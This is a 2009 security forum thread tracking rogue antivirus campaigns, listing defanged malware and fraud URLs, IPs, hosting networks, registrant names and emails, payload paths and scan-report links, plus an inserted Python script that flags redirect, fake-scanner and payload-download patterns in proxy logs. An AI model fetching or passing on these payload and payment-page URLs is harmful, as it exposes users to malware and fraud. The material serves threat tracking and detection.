hxxp://spy-cops-2009.com
hxxp://spy-re-mover.com
hxxp://superantivirus2009.com
hxxp://sys-antispy2009.com
hxxp://ultimate-anti-virus.com
hxxp://vis-antispy2008.com
hxxp://windows-antispy2008.com
Registrant: Andrey Kozoev / arich3221@ yahoo.com

Code: [Select]
hxxp://antivirus-buy1.com
Registrant: Andrey Kochetkov / arich3221@ yahoo.com

Code: [Select]
hxxp://advanced-antivirus.com
hxxp://antispyware-solutions.com
hxxp://antiviral-softtools.com
hxxp://antivirus-research-lab.com
hxxp://fight-viruses-corp.com
hxxp://kill-adware-soft.com
hxxp://spy-terminators.com
hxxp://spyware-preventer.com
hxxp://spyware-remover-inc.com
Registrant: Private Registration

AS28753 (NETDIRECT)

Fraudulent payment page for Rogue AV
95.168.163.83 [95-168-163-83.rackcorp.com]
Code: [Select]
hxxps://secure.aquabilling.com/payment/?domain=pc-privacydefender.com&aid=pspdapbill&affid=0
Registrant: Live Internet Marketing Limited  / aquabilling.com@ liveinternetmarketingltd.com

Redirects to Rogue:
89.149.210.154  [89-149-210-154.internetserviceteam.com]
Code: [Select]
hxxp://jasovsk.cn/bestway.js
hxxp://sappac.cn/bestway.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=b6cbe6c881c59a1b88714a479e52b6e3&t=1243078138&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=a8970ca2dfe1e3083215f7cb01cb3d6c&t=1243078097&type=js)
Registrant: KuznetsPavel / cndomains@ thirddor.info
Registrant: cndomains@ thirddor.info

Redirects to Rogue Antivirus:
89.149.212.137 [89.149.212.137.internetserviceteam.com]
Code: [Select]
hxxp://yuokqwr.cn/bestway.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=5f34f0eee66a5c099d2b25d326a5813f&t=1243078038&type=js)
Registrant: kanscx@ gmail.com

AS3491 (BTN)

Fraudulent payment page for Rogue AV
209.8.45.124 [209-8-45-124.btnaccess.net]
Code: [Select]
hxxps://secure.pnm-software.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=syssec&&advert=00000
Registrant: Live Internet Marketing Limited / pnm-software.com@ liveinternetmarketingltd.com

Fraudulent payment page for Rogue AV
78.46.216.237 [static.237.216.46.78.clients.your-server.de]
Code: [Select]
hxxps://secure.premium-software-store.com/billing/?nh=1&id=
Wepawet (http://wepawet.iseclab.org/view.php?hash=841e7d0ab9c2e26a8314f50e5bdb848d&t=1243076914&type=js)
Registrant: Mikhail Peshkov / xors678@ freebbmail.com

Redirects to fraudulent payment page for Rogue AV

AS24940 (HETZNER)
78.47.172.66 [static.66.172.47.78.clients.your-server.de]
Code: [Select]
hxxp://systemsupportnetwork.com/1/
hxxp://brabusautomoto.cn/buy.php?nh=1&id=
Wepawet (http://wepawet.iseclab.org/view.php?hash=841e7d0ab9c2e26a8314f50e5bdb848d&t=1243076914&type=js)
Registrant: Edisson H Tom / tomahawk@ adeneli.com
Registrant: RoderickKiewiet@gmail.com

Redirects to Rogue:
78.47.172.66 [static.66.172.47.78.clients.your-server.de]
Code: [Select]
hxxp://advanedpromalwarescanner.com/go.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=83a91cc83212dd57d3899c793249c5e1&t=1243076034&type=js)
Registrant: Mikhail Peshkov / xors678@ freebbmail.com

Rogue:
AS13237 (LAMBDANET)
83.133.126.155 [t529.1paket.com]
Code: [Select]
hxxp://anti-spyware-scan-v1.com/1/?id=11-1&smersh=e5880e7dd&back=%3DDQw2TzwMcQNMI%3DO
hxxp://anti-spyware-scan-v1.com/download.php?id=11-1
VirusTotal (http://www.virustotal.com/analisis/c03ac99c56ce7e0d7531cc486afbafb3162b887d6b471c03ebea537822880b83-1243075231) - 1/40 (2.50%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=41fce4c174d7f7bf45c19c1841cb0834&t=1243075786&type=js)
Anubis (http://anubis.iseclab.org/?action=result&task_id=17bc7e7e4ac0ab89405f5a9d6357e22ca&call=first)
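The posts above keep showing the same three-step shape: a redirector (in.cgi?N, bestway.js, promoN/get.php), a fake-scanner landing page (/1/?id=...&smersh=...&back=...) and a payload fetch (download.php, /download/install.php or .exe, /install/ws.exe). As an added example that is not part of this thread, the script below matches those path shapes against proxy log lines and rebuilds the per-client chain, so a single redirector hit can be tied to the landing page and the download that followed it. The log line format, the 10.1.4.x client addresses and the pattern labels are assumptions; the hosts and paths come from the IOCs posted here.

```python
import re
from urllib.parse import urlparse

# Path shapes that recur across the redirectors, landing pages and payload URLs
# posted in this thread. The labels are my own; the shapes are from the posts.
# Order matters: the more specific landing-page shape is tested before the
# generic download.php payload shape.
ROGUE_PATH_PATTERNS = [
    ("tds_redirect",      re.compile(r"/in\.cgi\?\d+$")),
    ("js_redirector",     re.compile(r"/bestway\.js$")),
    ("fake_scan_landing", re.compile(r"/\d+/\?id=[\w-]+&smersh=[0-9a-f]+&back=")),
    ("promo_dropper",     re.compile(r"/promo\d+/get\.php$")),
    ("install_payload",   re.compile(
        r"/download/install\.(?:php|exe)$|/download\.php(?:\?|$)|/install/ws\.exe$")),
]

# One request per line: timestamp, client, method, URL. Constructed sample:
# hosts and paths are taken from the IOCs in this thread, clients are invented.
SAMPLE_PROXY_LOG = """\
2009-05-23T18:07:21Z 10.1.4.22 GET http://islandtravet.cn/in.cgi?6
2009-05-23T18:07:22Z 10.1.4.22 GET http://computerscanv1.com/1/?id=11-1&smersh=33a8c6a42&back=%3DTQxyTjwMYQMMI%3DO
2009-05-23T18:07:40Z 10.1.4.22 GET http://computerscanv1.com/download.php?id=11-1
2009-05-23T18:09:03Z 10.1.4.57 GET http://free-antivirus-engine.com/promo1/get.php
2009-05-23T18:09:10Z 10.1.4.57 GET http://www.example.org/index.php
2009-05-23T18:10:15Z 10.1.4.80 GET http://jasovsk.cn/bestway.js
2009-05-23T18:10:16Z 10.1.4.80 GET http://mix4scan.info/download/install.exe
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")


def classify(url):
    """Return the label of the first rogue-AV path shape the URL's path+query matches, else None."""
    parts = urlparse(url)
    target = parts.path + ("?" + parts.query if parts.query else "")
    for label, pattern in ROGUE_PATH_PATTERNS:
        if pattern.search(target):
            return label
    return None


def scan_log(text):
    """Return (client, label, url) for every request that matches a rogue-AV path shape."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        label = classify(m.group("url"))
        if label:
            hits.append((m.group("client"), label, m.group("url")))
    return hits


def chains(hits):
    """Per client, the ordered labels seen; redirect -> landing -> payload is a full infection."""
    out = {}
    for client, label, _ in hits:
        out.setdefault(client, []).append(label)
    return out


if __name__ == "__main__":
    found = scan_log(SAMPLE_PROXY_LOG)
    for client, labels in sorted(chains(found).items()):
        print(client, " -> ".join(labels))
```

A client whose chain ends in install_payload has fetched the rogue installer and needs the host looked at; a chain that stops at the landing page means the scanner page loaded but the download was not requested (or was blocked), which is the difference between a detection and an incident.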
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 23, 2009, 06:14:53 pm
AS21844 (THEPLANET)
174.132.250.194 [c2.fa.84ae.static.theplanet.com]

redirectors for malwareremovalbot[.]com
Code: [Select]
hxxp://malwarebot.org/download.php
hxxp://malwaree.com/download.php
hxxp://malwaree.org/download.php
hxxp://remove-ie-security.com/download.php
hxxp://remove-malware-defender.com/download.php
hxxp://remove-ms-antispyware.com/download.php
hxxp://remove-personal-defender.com/download.php
hxxp://remove-spyware-guard.com/download.php
hxxp://remove-spyware-protect-2009.com/download.php
hxxp://remove-spyware-protect.com/download.php
hxxp://remove-system-guard.com/download.php
hxxp://remove-total-security.com/download.php
hxxp://remove-ultra-antivir-2009.com/download.php
hxxp://remove-virus-alarm.com/download.php
hxxp://remove-virus-melt.com/download.php
hxxp://remove-winpc-defender.com/download.php

and for antivirus360remover[.]com
Code: [Select]
hxxp://remove-a360.com/download.php
hxxp://remove-antivirus-360.com/download.php
hxxp://remove-av360.com/download.php
hxxp://smitfraudfixtool.com/install.php
hxxp://vundofixtool.com/install.php
hxxp://av360removaltool.com/install.php
hxxp://antivirus360remover.com/install.php

Private registration for all
Title: Re: Rogue - Fake AV
Post by: boston on May 26, 2009, 03:26:35 pm
xttp://noadware.net/noadware.exe
http://www.virustotal.com/analisis/2ec01a76368d7e3d3fce1029e92f9729a2dee1b6d5e267cb5bd5519f2c062e3a-1242866590
(xttp://deletespyware-adware.com)
*
xttp://antivirus-doktor.com/antivirusdoktor.exe
http://www.virustotal.com/analisis/16c890543d903c93e0b93bdb8260fc5c2ebea6d077173d67367adf7ed9501d69-1243323303
*
xttp://registry-doktor.com/registrycleanerdoktor.exe
http://www.virustotal.com/analisis/82b5ec3f2d01ea50a421d1b8c479fc710138377dd1317a3023f331f6d07f9bc6-1243337791
*
xttp://noadware.com/download/nans.exe
http://www.virustotal.com/analisis/ad5ba01c6615129946f89e31b58732d12572151cba2aa7af88915e95a43f8ab3-1241344756
Title: Re: Rogue - Fake AV
Post by: boston on May 26, 2009, 07:43:26 pm
xttp://adware-clean.com + xttp://adware-download.com redirect to xttp://adwarealert2009.com.
xttp://adwarealert2009.com/install.php
http://www.virustotal.com/analisis/5b0450e3118f78346f688a88a836ea1cc19a6f38ec1e2d65e3757201e07e70e9-1243353062
*
xttp://intelinet-secure.com/setup.exe
http://www.virustotal.com/analisis/be4688fe9a9d937e5aacd4faec7845eea60e7a912d89d9bc9fdd3a74b060e63d-1243343496
*
xttp://anti-virus-professional.com/antivirus-pro.exe
http://www.virustotal.com/analisis/c164fd4b13400166d249c1ebef94a0f0991fdddd6b1cd9f7467647aec4cac97f-1243343805
(related to xttp://noadware.net:
http://www.threatexpert.com/report.aspx?md5=2996f7cd047cd24c7117b1bbc1df64df)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 28, 2009, 06:11:40 am
AS10929 (NETELLIGENT)
209.44.126.102

Code: [Select]
keyscan4.info/download/install.php
scan4key.info/download/install.php
scanmeta4.info/download/install.php
scannote4.info/download/install.php
scan4auto.info/download/install.php
autoscan4.info/download/install.php
scan4fix.info/download/install.php
fix4scan.info/download/install.php
fixscan4.info/download/install.php
Registrant: William Leland / sitintu@ gmail.com

Code: [Select]
scangen4.info/download/install.php
gen4scan.info/download/install.php
genscan4.info/download/install.php
notescan4.info/download/install.php
Registrant: Edmund Moss / finewnrk@ gmail.com

Code: [Select]
scan4fine.info/download/install.php
scanauto4.info/download/install.php
scanflex4.info/download/install.php
flex4scan.info/download/install.php
Registrant: John Redwine / mexnacc@ gmail.com

VirusTotal (http://www.virustotal.com/analisis/250c373bbf6ce33aea746b8332fed73113b8238e4e6ead1e89b237846462854b-1243462297) - 5/39 (12.82%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=170f182eb213f96d4210ee1e34b51a8b1)

Redirects:
Code: [Select]
goautoscan.com
goscanauto.com
gofinescan.com
goflexscan.com
goscanfine.com
goscanflex.com
Registrant:
Claudio Canella / tanehen@ gmail.com
Enrico Schiru / canrcnad@ gmail.com
Francesco Carpa / alcnafuch@ gmail.com
Francesco Carpa / alcnafuch@ gmail.com
Gianluce Baruzi / chirelqas@ gmail.com
Gianluce Baruzi / chirelqas@ gmail.com

209.44.126.241
Code: [Select]
castsecurityshield.com/download.php
securityfastscan.com/download.php
Privacy Protect
Title: Re: Rogue - Fake AV
Post by: boston on May 29, 2009, 10:05:52 pm
xttp://adwareprofessional.com/adwareprofessional.exe (xttp://adware-2009.com)
(related to xttp://noadware.net:
http://www.threatexpert.com/report.aspx?md5=cd825dbc50e170b1d9e8902af3cce923)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 29, 2009, 10:28:06 pm
and related to registryfix[.]com
Code: [Select]
hxxp://web2.noadware.net
hxxp://web1.noadware.net

other files

downloader:
Code: [Select]
hxxp://www.noadware.net/clicks/o.php?http://www.noadware.net/noadware.exe
VirusTotal (http://www.virustotal.com/analisis/2ec01a76368d7e3d3fce1029e92f9729a2dee1b6d5e267cb5bd5519f2c062e3a-1243635775) - 5/40 (12.5%)

config:
Code: [Select]
hxxp://noadware.net/def/noadware4_052909.na.zip
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 07, 2009, 08:43:25 am
AS29131 (RAPIDSWITCH)

78.129.166.166

Code: [Select]
antivir-soft.com
antivirus-protection-tools.com
mybest-adult.com
mybigportal.com
mytop-porn.com
porn-hub-online.com
porn-tubes-hub.com
top-portalnet.com
universal-antivirus.com

payloads:

/promo1/get.php
/promo2/get.php
/promo3/get.php
/promo4/get.php

AS10929 (NETELLIGENT)

209.44.126.36
Code: [Select]
virtualinternetsecurity.com
topsvirusdefender.com

payload: download.php

209.44.126.22
Code: [Select]
yoursecuritydisability.com
payload: download.php

209.44.126.104
Code: [Select]
scan4hard.info
scan4mode.info
scan4full.info
fine4scan.info
one4scan.info
scanfine4.info
scanone4.info
scanpage4.info
scan4goal.info
scan4area.info

payload: /download/install.php

209.44.126.102

Code: [Select]
hard4scan.info
scanstar6.info
scanray6.info
scanmix6.info
scanfan6.info
scan6meta.info
note6scan.info
meta6scan.info

payload: /download/install.php

89.149.207.213 [89-149-207-213.internetserviceteam.com] - AS28753 (NETDIRECT)

Code: [Select]
acyikap.cn
adiuqga.cn
adocyha.cn
exeype.cn
fevopru.cn
gebomuk.cn
friskdiseasestore.cn

payload: installer_1.exe

AS16265 (LEASEWEB)

94.75.221.73 
Code: [Select]
scanspywaresonline.com/demo.php?ewmid=205
scanspywaresonline.com/download/10520/205/AntiSpywarePro_Installer_eng.exe

94.75.209.11 - (fraudulent payment page)

Code: [Select]
secure.xsoftstore.com/cgi-bin/bill.cgi?id=33&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=34&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=35&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=36&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=40&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=43&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=49&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=55&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=61&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=73&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=39_42&type=cc

94.75.209.11 - redirects
Code: [Select]
seresult.com/go.php
94.75.209.11 - rogue
Code: [Select]
scanner.extrantivirus.com/35/?advid=6357&ref=&p=1000000000
scanner.extrantivirus.com/exe/setup_26357_0.exe
scanner.rapidantivirus-09.com/33/
scanner.rapidantivirus-09.com/setup/install_511_MHwzM3wwfHx8fHx8fHw_.exe
scanner.rapid-antivir-2009.com/33/
scanner.rapid-antivir-2009.com/setup/install_511_MHwzM3wwfHx8fHx8fHw_.exe

AS30407 (VELCOM)

Code: [Select]
virusdoctor-onlinedefender.com/?p=WKmimHVlaGmSYJacV5GPlqR1sXCjhHOuU8/XoGddoami2NmRglqbnZxxmpiqcps=
virusdoctor-onlinedefender.com/build6_1001326.php
pro-antivirus.net/?p=WKmimHVlaGuHjsbIo22Dh3qBqXmmVpzZapmK0qR0qay6z66noaunWpqdnHbDjLnUnJ6cq6A=
fast-antivirus.com/?p=WKmimHVlaGuHjsbIo22Dh3qBqXmmVpzZapmK0qR0qay6z66noaunWpqdnHbDjLnUnJ6cq6A=
fra22.net/?pid=3&uid=1001326&abbr=EXAVR
pay1.fastantivirus09.com/lo/FASTAV/1/index.php?pc_id=&uid=0&ls=1&bid=b_Unknown&t=day&np=&pid=3&sid=&wv=wvUnKnown&verint=&presale_id=6&abbr=FASTAV&pid=3

config for rogue (listed)

Code: [Select]
updvms.cn
updvms.net

payloads for updvms.cn:

Quote
/EXAVR/ActivatedRelease.exe
/EXAVR/ActivatedReleaseXP.exe
/EXAVR/ActivatedSetup.exe
/EXAVR/ActivatedSetupRelease.cab
/EXAVR/ActivatedSetupRelease.exe
/EXAVR/ActivatedSetupReleaseXP.cab
/EXAVR/ActivatedSetupReleaseXP.exe
/EXAVR/BankSetupRelease.exe
/EXAVR/Release.exe
/EXAVR/ReleaseXP.exe
/EXAVR/SetupPack.exe
/EXAVR/SetupRelease.cab
/EXAVR/SetupRelease.exe
/EXAVR/SetupReleaseXP.cab
/EXAVR/SetupReleaseXP.exe
/EXAVR/Work.exe
/EXAVR/setup.exe
/EXAVR/uninstall.exe
/EXAVR/update.exe
/FASTAV/ActivatedRelease.exe
/FASTAV/ActivatedReleaseXP.exe
/FASTAV/ActivatedSetup.exe
/FASTAV/ActivatedSetupRelease.cab
/FASTAV/ActivatedSetupRelease.exe
/FASTAV/ActivatedSetupReleaseXP.cab
/FASTAV/ActivatedSetupReleaseXP.exe
/FASTAV/Release.exe
/FASTAV/ReleaseXP.exe
/FASTAV/SetupPack.exe
/FASTAV/SetupRelease.cab
/FASTAV/SetupRelease.exe
/FASTAV/SetupReleaseXP.cab
/FASTAV/SetupReleaseXP.exe
/FASTAV/Work.exe
/FASTAV/uninstall.exe
/FASTAV/update.exe
/MCATCH/ActivatedRelease.exe
/MCATCH/ActivatedReleaseXP.exe
/MCATCH/ActivatedSetup.exe
/MCATCH/ActivatedSetupRelease.cab
/MCATCH/ActivatedSetupRelease.exe
/MCATCH/ActivatedSetupReleaseXP.cab
/MCATCH/ActivatedSetupReleaseXP.exe
/MCATCH/Release.exe
/MCATCH/ReleaseXP.exe
/MCATCH/SetupPack.exe
/MCATCH/SetupRelease.cab
/MCATCH/SetupRelease.exe
/MCATCH/SetupReleaseXP.cab
/MCATCH/SetupReleaseXP.exe
/MCATCH/Work.exe
/MCATCH/uninstall.exe
/MCATCH/update.exe
/PRTUP/ActivatedReleaseXP.exe
/PRTUP/ActivatedSetup.exe
/PRTUP/ActivatedSetupReleaseXP.cab
/PRTUP/ActivatedSetupReleaseXP.exe
/PRTUP/ReleaseXP.exe
/PRTUP/SetupRelease.exe
/PRTUP/SetupReleaseXP.cab
/PRTUP/SetupReleaseXP.exe
/PRTUP/Work.exe
/PRTUP/uninstall.exe
/PRTUP/update.exe
/UA2009/ActivatedRelease.exe
/UA2009/ActivatedReleaseXP.exe
/UA2009/ActivatedSetup.exe
/UA2009/ActivatedSetupRelease.cab
/UA2009/ActivatedSetupRelease.exe
/UA2009/ActivatedSetupReleaseXP.cab
/UA2009/ActivatedSetupReleaseXP.exe
/UA2009/Release.exe
/UA2009/ReleaseXP.exe
/UA2009/Rpdm.exe
/UA2009/SetupRelease.cab
/UA2009/SetupRelease.exe
/UA2009/SetupReleaseXP.cab
/UA2009/SetupReleaseXP.exe
/UA2009/Work.exe
/UA2009/setup.exe
/UA2009/setup1.exe
/UA2009/uninstall.exe
/UA2009/update.exe
/VALARM/ActivatedRelease.exe
/VALARM/ActivatedReleaseXP.exe
/VALARM/ActivatedSetup.exe
/VALARM/ActivatedSetupRelease.cab
/VALARM/ActivatedSetupRelease.exe
/VALARM/ActivatedSetupReleaseXP.cab
/VALARM/ActivatedSetupReleaseXP.exe
/VALARM/Release.exe
/VALARM/ReleaseXP.exe
/VALARM/SetupRelease.cab
/VALARM/SetupRelease.exe
/VALARM/SetupReleaseXP.cab
/VALARM/SetupReleaseXP.exe
/VALARM/Work.exe
/VALARM/uninstall.exe
/VALARM/update.exe
/VMLT/ActivatedRelease.exe
/VMLT/ActivatedReleaseXP.exe
/VMLT/ActivatedSetup.exe
/VMLT/ActivatedSetupRelease.cab
/VMLT/ActivatedSetupRelease.exe
/VMLT/ActivatedSetupReleaseXP.cab
/VMLT/ActivatedSetupReleaseXP.exe
/VMLT/Release.exe
/VMLT/ReleaseXP.exe
/VMLT/SetupRelease.cab
/VMLT/SetupRelease.exe
/VMLT/SetupReleaseXP.cab
/VMLT/SetupReleaseXP.exe
/VMLT/Work.exe
/VMLT/setup.exe
/VMLT/uninstall.exe
/VMLT/update.exe
/VSHIELD/ActivatedRelease.exe
/VSHIELD/ActivatedReleaseXP.exe
/VSHIELD/ActivatedSetup.exe
/VSHIELD/ActivatedSetupRelease.cab
/VSHIELD/ActivatedSetupRelease.exe
/VSHIELD/ActivatedSetupReleaseXP.cab
/VSHIELD/ActivatedSetupReleaseXP.exe
/VSHIELD/Release.exe
/VSHIELD/ReleaseXP.exe
/VSHIELD/SetupPack.exe
/VSHIELD/SetupRelease.cab
/VSHIELD/SetupRelease.exe
/VSHIELD/SetupReleaseXP.cab
/VSHIELD/SetupReleaseXP.exe
/VSHIELD/Work.exe
/VSHIELD/uninstall.exe
/VSHIELD/update.exe
/VSWEEPR/ActivatedRelease.exe
/VSWEEPR/ActivatedReleaseXP.exe
/VSWEEPR/ActivatedSetup.exe
/VSWEEPR/ActivatedSetupRelease.cab
/VSWEEPR/ActivatedSetupRelease.exe
/VSWEEPR/ActivatedSetupReleaseXP.cab
/VSWEEPR/ActivatedSetupReleaseXP.exe
/VSWEEPR/Instructions.ini
/VSWEEPR/Release.exe
/VSWEEPR/ReleaseXP.exe
/VSWEEPR/SetupPack.exe
/VSWEEPR/SetupRelease.cab
/VSWEEPR/SetupRelease.exe
/VSWEEPR/SetupReleaseXP.cab
/VSWEEPR/SetupReleaseXP.exe
/VSWEEPR/Work.exe
/VSWEEPR/uninstall.exe
/VSWEEPR/update.exe

payloads for updvms.net:

Quote
/FASTAV/ActivatedRelease.exe
/FASTAV/ActivatedReleaseXP.exe
/FASTAV/ActivatedSetup.exe
/FASTAV/ActivatedSetupRelease.cab
/FASTAV/ActivatedSetupRelease.exe
/FASTAV/ActivatedSetupReleaseXP.cab
/FASTAV/ActivatedSetupReleaseXP.exe
/FASTAV/Release.exe
/FASTAV/ReleaseXP.exe
/FASTAV/SetupPack.exe
/FASTAV/SetupRelease.cab
/FASTAV/SetupRelease.exe
/FASTAV/SetupReleaseXP.cab
/FASTAV/SetupReleaseXP.exe
/FASTAV/Work.exe
/FASTAV/uninstall.exe
/FASTAV/update.exe
/MCATCH/ActivatedRelease.exe
/MCATCH/ActivatedReleaseXP.exe
/MCATCH/ActivatedSetup.exe
/MCATCH/ActivatedSetupRelease.cab
/MCATCH/ActivatedSetupRelease.exe
/MCATCH/ActivatedSetupReleaseXP.cab
/MCATCH/ActivatedSetupReleaseXP.exe
/MCATCH/Release.exe
/MCATCH/ReleaseXP.exe
/MCATCH/SetupPack.exe
/MCATCH/SetupRelease.cab
/MCATCH/SetupRelease.exe
/MCATCH/SetupReleaseXP.cab
/MCATCH/SetupReleaseXP.exe
/MCATCH/Work.exe
/MCATCH/uninstall.exe
/MCATCH/update.exe
/PRTUP/ActivatedReleaseXP.exe
/PRTUP/ActivatedSetup.exe
/PRTUP/ActivatedSetupReleaseXP.cab
/PRTUP/ActivatedSetupReleaseXP.exe
/PRTUP/ReleaseXP.exe
/PRTUP/SetupRelease.exe
/PRTUP/SetupReleaseXP.cab
/PRTUP/SetupReleaseXP.exe
/PRTUP/Work.exe
/PRTUP/uninstall.exe
/PRTUP/update.exe
/UA2009/ActivatedRelease.exe
/UA2009/ActivatedReleaseXP.exe
/UA2009/ActivatedSetup.exe
/UA2009/ActivatedSetupRelease.cab
/UA2009/ActivatedSetupRelease.exe
/UA2009/ActivatedSetupReleaseXP.cab
/UA2009/ActivatedSetupReleaseXP.exe
/UA2009/Release.exe
/UA2009/ReleaseXP.exe
/UA2009/Rpdm.exe
/UA2009/SetupRelease.cab
/UA2009/SetupRelease.exe
/UA2009/SetupReleaseXP.cab
/UA2009/SetupReleaseXP.exe
/UA2009/Work.exe
/UA2009/setup.exe
/UA2009/setup1.exe
/UA2009/uninstall.exe
/UA2009/update.exe
/VALARM/ActivatedRelease.exe
/VALARM/ActivatedReleaseXP.exe
/VALARM/ActivatedSetup.exe
/VALARM/ActivatedSetupRelease.cab
/VALARM/ActivatedSetupRelease.exe
/VALARM/ActivatedSetupReleaseXP.cab
/VALARM/ActivatedSetupReleaseXP.exe
/VALARM/Release.exe
/VALARM/ReleaseXP.exe
/VALARM/SetupRelease.cab
/VALARM/SetupRelease.exe
/VALARM/SetupReleaseXP.cab
/VALARM/SetupReleaseXP.exe
/VALARM/Work.exe
/VALARM/uninstall.exe
/VALARM/update.exe
/VMLT/ActivatedRelease.exe
/VMLT/ActivatedReleaseXP.exe
/VMLT/ActivatedSetup.exe
/VMLT/ActivatedSetupRelease.cab
/VMLT/ActivatedSetupRelease.exe
/VMLT/ActivatedSetupReleaseXP.cab
/VMLT/ActivatedSetupReleaseXP.exe
/VMLT/Release.exe
/VMLT/ReleaseXP.exe
/VMLT/SetupRelease.cab
/VMLT/SetupRelease.exe
/VMLT/SetupReleaseXP.cab
/VMLT/SetupReleaseXP.exe
/VMLT/Work.exe
/VMLT/setup.exe
/VMLT/uninstall.exe
/VMLT/update.exe
/VSHIELD/ActivatedRelease.exe
/VSHIELD/ActivatedReleaseXP.exe
/VSHIELD/ActivatedSetup.exe
/VSHIELD/ActivatedSetupRelease.cab
/VSHIELD/ActivatedSetupRelease.exe
/VSHIELD/ActivatedSetupReleaseXP.cab
/VSHIELD/ActivatedSetupReleaseXP.exe
/VSHIELD/Release.exe
/VSHIELD/ReleaseXP.exe
/VSHIELD/SetupPack.exe
/VSHIELD/SetupRelease.cab
/VSHIELD/SetupRelease.exe
/VSHIELD/SetupReleaseXP.cab
/VSHIELD/SetupReleaseXP.exe
/VSHIELD/Work.exe
/VSHIELD/uninstall.exe
/VSHIELD/update.exe
/VSWEEPR/ActivatedRelease.exe
/VSWEEPR/ActivatedReleaseXP.exe
/VSWEEPR/ActivatedSetup.exe
/VSWEEPR/ActivatedSetupRelease.cab
/VSWEEPR/ActivatedSetupRelease.exe
/VSWEEPR/ActivatedSetupReleaseXP.cab
/VSWEEPR/ActivatedSetupReleaseXP.exe
/VSWEEPR/Release.exe
/VSWEEPR/ReleaseXP.exe
/VSWEEPR/SetupPack.exe
/VSWEEPR/SetupRelease.cab
/VSWEEPR/SetupRelease.exe
/VSWEEPR/SetupReleaseXP.cab
/VSWEEPR/SetupReleaseXP.exe
/VSWEEPR/Work.exe
/VSWEEPR/uninstall.exe
/VSWEEPR/update.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 07:07:48 am
AS48669 NTCOLO

Rogue / Fraud

194.165.4.140
Code: [Select]
hxxp://wopayment.com
194.165.4.41
Code: [Select]
hxxp://windoptimizer.com
hxxp://woptim.com

194.165.4.224
Code: [Select]
hxxp://data-saver.org
hxxp://databackuper.com
hxxp://genantivirus.com

194.165.4.77
Code: [Select]
hxxp://homepcupdate.com/file.exe
hxxp://homepcupdate.com/codec.exe
hxxp://homepcupdate.com/pcdef.exe
hxxp://homepcupdate.com/codec/197.exe

VirusTotal (http://www.virustotal.com/analisis/0c3f935bf9a18c380742de542326542cd92ef2fbb172b9a5a659f928df6bab55-1244170030)
VirusTotal (http://www.virustotal.com/analisis/3f952397ee3a0fab7f828977e96d278be7e60f43de6f495c1fb7e7579cfcf616-1244170022)
VirusTotal (http://www.virustotal.com/analisis/b579633e1705f3fedcbf74dd09ae3981ce70069043ea49eb508678f5f40db070-1244170039)
VirusTotal (http://www.virustotal.com/analisis/afa98707ece05cc2e0645e0d1fc2b9be3f4c14c1dcc33b0094a3b0fc053eabb9-1244170010)

http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=194.165&colsearch=All&ascordesc=ASC&quantity=100&page=0
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 07:29:21 am
redirects to rogue
Code: [Select]
hxxp://nakedfridaydresscode.com/in.cgi?6
hxxp://thetrafficcontrol.net/in.cgi?6
hxxp://promodomain.info/in.cgi?6
hxxp://allvideo.org.uk/in.cgi?6
hxxp://blackporn1.com/in.cgi?6
hxxp://blackpornmix.com/in.cgi?6
hxxp://a7ii.info/dintest/
hxxp://freshstats1.com/redirect2/

222.73.219.58
Code: [Select]
hxxp://googleactive.com/private_default_x.php?6
hxxp://dressnowbeach.cn/in.cgi?6
hxxp://palaceclub.cn/in.cgi?6
hxxp://workforex.cn/in.cgi?6
hxxp://millionsdream.cn/in.cgi?6
hxxp://pharmacyeasy.cn/in.cgi?6
hxxp://wowneo.cn/in.cgi?6
hxxp://nailimpro.cn/in.cgi?6
hxxp://forexsec.cn/in.cgi?6
hxxp://traveltravet.cn/in.cgi?6
hxxp://tripsstart.cn/in.cgi?6

217.20.113.236
Code: [Select]
hxxp://yourbestway.su/bestway.js

78.159.114.140
Code: [Select]
hxxp://farmauts.info/bestway.js
hxxp://aboutauts.info/bestway.js
hxxp://aboutauts.info/in.cgi?3

94.76.213.104
Code: [Select]
hxxp://everylog1.com/in.cgi?9
hxxp://everylog1.com/redirect2/

205.177.124.46
Code: [Select]
hxxp://barba.tv/AntonellaBarbaBlowjob1.avi
hxxp://avrilnude.net/AvrilNude1.avi
hxxp://barba.in/AntonellaBarbaBlowjob2.avi
hxxp://britneyshaved.com/BritneySpearsPussy1.avi
hxxp://britneyexposed.org/BritneyExposedVideo2.avi
hxxp://bestbritneypics.com/BritneyVideo2.avi
hxxp://freecelebsvideo.com/BritneyVideo2.avi
hxxp://parisvideo.org/ParisVideo-1.avi

83.133.123.140
Code: [Select]
hxxp://privateaolemail.cn/go.php?id=2019&key=572c78987&p=1
205.177.124.46

fraud
Code: [Select]
hxxp://secure.bestbuysystem.com/buy.php?nh=1&id=
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 08:02:54 am
hello to liveinternetupdates[.]com

http://anubis.iseclab.org/?action=result&task_id=1fec51e60b0b88d5441807b30e7942146

Code: [Select]
